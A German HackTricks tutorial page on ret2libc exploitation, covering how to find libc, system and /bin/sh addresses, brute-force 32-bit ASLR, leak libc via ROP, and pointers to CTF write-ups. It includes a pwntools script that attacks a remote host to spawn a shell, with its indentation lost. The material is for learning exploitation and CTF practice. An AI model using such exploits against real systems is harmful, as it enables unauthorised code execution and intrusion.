Ret2lib

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

Grundlegende Informationen

Die Essenz von Ret2Libc besteht darin, den Ausführungsfluss eines anfälligen Programms auf eine Funktion in einer gemeinsam genutzten Bibliothek (z. B. system, execve, strcpy) umzuleiten, anstatt ausführbaren Shellcode auf dem Stapel des Angreifers auszuführen. Der Angreifer erstellt eine Nutzlast, die die Rückkehradresse auf dem Stapel so ändert, dass sie auf die gewünschte Bibliotheksfunktion zeigt, und gleichzeitig dafür sorgt, dass alle erforderlichen Argumente gemäß der Aufrufkonvention korrekt eingerichtet sind.

Beispiel-Schritte (vereinfacht)

Ermitteln Sie die Adresse der zu aufrufenden Funktion (z. B. system) und den auszuführenden Befehl (z. B. /bin/sh)
Generieren Sie eine ROP-Kette, um das erste Argument zu übergeben, das auf den Befehlsstring zeigt, und den Ausführungsfluss zur Funktion zu lenken

Adressen finden

Angenommen, die verwendete libc ist diejenige des aktuellen Rechners, können Sie herausfinden, wo sie im Speicher geladen wird mit:

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

Wenn Sie überprüfen möchten, ob ASLR die Adresse von libc ändert, können Sie Folgendes tun:

for i in `seq 0 20`; do ldd ./<bin> | grep libc; done

Wenn die verwendete libc bekannt ist, ist es auch möglich, den Offset zur system-Funktion mit folgendem Befehl zu finden:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

Wenn die verwendete libc bekannt ist, ist es auch möglich, den Offset zur Zeichenkette /bin/sh-Funktion zu finden mit:

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Mit gdb-peda / GEF

Wenn die verwendete libc bekannt ist, ist es auch möglich, Peda oder GEF zu verwenden, um die Adresse der Funktion system, der Funktion exit und des Strings /bin/sh zu erhalten:

p system
p exit
find "/bin/sh"

Verwendung von /proc/<PID>/maps

Wenn der Prozess jedes Mal, wenn Sie mit ihm sprechen (Netzwerkserver), Kinder erstellt, versuchen Sie, diese Datei zu lesen (wahrscheinlich müssen Sie root sein).

Hier können Sie genau herausfinden, wo die libc im Prozess geladen ist und wo sie für jedes Kind des Prozesses geladen wird.

In diesem Fall wird sie bei 0xb75dc000 geladen (Dies wird die Basisadresse der libc sein)

Unbekannte libc

Es könnte möglich sein, dass Sie nicht wissen, welche libc die Binärdatei lädt (weil sie sich auf einem Server befinden könnte, auf den Sie keinen Zugriff haben). In diesem Fall könnten Sie die Schwachstelle ausnutzen, um einige Adressen preiszugeben und herauszufinden, welche libc-Bibliothek verwendet wird:

pageLeaking libc address with ROP

Und Sie können eine pwntools-Vorlage dafür finden unter:

pageLeaking libc - template

Bekannte libc mit 2 Offsets

Überprüfen Sie die Seite https://libc.blukat.me/ und verwenden Sie ein paar Adressen von Funktionen innerhalb der libc, um die verwendete Version herauszufinden.

Umgehung von ASLR in 32 Bit

Diese Brute-Force-Angriffe sind nur für 32-Bit-Systeme nützlich.

Wenn der Exploit lokal ist, können Sie versuchen, die Basisadresse der libc per Brute-Force anzugreifen (nützlich für 32-Bit-Systeme):

for off in range(0xb7000000, 0xb8000000, 0x1000):

Wenn Sie einen Remote-Server angreifen, könnten Sie versuchen, die Adresse der libc-Funktion usleep durch Brute-Force zu ermitteln und dabei 10 (zum Beispiel) als Argument zu übergeben. Wenn der Server zu einem bestimmten Zeitpunkt 10 Sekunden länger braucht, um zu antworten, haben Sie die Adresse dieser Funktion gefunden.

Ein Gadget

Führen Sie eine Shell aus, indem Sie einfach zu einer bestimmten Adresse in der libc springen:

pageOne Gadget

x86 Ret2lib Codebeispiel

In diesem Beispiel ist das ASLR-Brute-Force in den Code integriert und die verwundbare Binärdatei befindet sich auf einem Remote-Server:

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE, could be address of exit()
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive()

x64 Ret2lib Code Beispiel

Überprüfen Sie das Beispiel unter:

pageROP - Return Oriented Programing

ARM64 Ret2lib Beispiel

Im Fall von ARM64 springt die ret-Anweisung dorthin, wo das Register x30 zeigt, und nicht dorthin, wo das Stack-Register zeigt. Daher ist es etwas komplizierter.

Auch in ARM64 tut eine Anweisung das, was die Anweisung tut (es ist nicht möglich, mitten in Anweisungen zu springen und sie in neue zu verwandeln).

Überprüfen Sie das Beispiel unter:

pageRet2lib + Printf leak - arm64

Ret-in-printf (oder puts)

Dies ermöglicht es, Informationen aus dem Prozess auszulesen, indem printf/puts mit bestimmten Daten als Argument aufgerufen wird. Wenn beispielsweise die Adresse von puts im GOT in einem Aufruf von puts platziert wird, wird die Adresse von puts im Speicher ausgelesen.

Ret2printf

Dies bedeutet im Grunde, einen Ret2lib zu missbrauchen, um ihn in eine printf-Formatstrings-Schwachstelle zu verwandeln, indem der ret2lib verwendet wird, um printf mit den Werten aufzurufen, um sie auszunutzen (klingt nutzlos, ist aber möglich):

pageFormat Strings

Weitere Beispiele & Referenzen

https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html
Ret2lib, gegeben ein Leak zur Adresse einer Funktion in libc, unter Verwendung eines Einzelgadgets
https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
64 Bit, ASLR aktiviert, aber kein PIE, der erste Schritt besteht darin, einen Überlauf bis zum Byte 0x00 des Canary zu füllen, um dann puts aufzurufen und ihn auszulesen. Mit dem Canary wird ein ROP-Gadget erstellt, um puts aufzurufen und die Adresse von puts aus dem GOT auszulesen, und dann ein ROP-Gadget, um system('/bin/sh') aufzurufen.
https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
64 Bit, ASLR aktiviert, kein Canary, Stacküberlauf in main von einer Unterfunktion. ROP-Gadget, um puts aufzurufen und die Adresse von puts aus dem GOT auszulesen, und dann ein Einzelgadget aufrufen.
https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html
64 Bit, kein PIE, kein Canary, kein relro, nx. Verwendet die write-Funktion, um die Adresse von write (libc) auszulesen, und ruft ein Einzelgadget auf.
https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html
Verwendet eine Formatzeichenfolge, um den Canary vom Stack auszulesen, und einen Pufferüberlauf, um in system (es ist im GOT) mit der Adresse von /bin/sh zu springen.
https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html
32 Bit, kein relro, kein Canary, nx, pie. Missbraucht eine schlechte Indizierung, um Adressen von libc und Heap vom Stack auszulesen. Missbraucht den Pufferüberlauf, um einen Ret2lib-Aufruf von system('/bin/sh') zu machen (die Heap-Adresse wird benötigt, um eine Überprüfung zu umgehen).

PreviousRet2esp / Ret2reg NextLeaking libc address with ROP

Last updated 3 days ago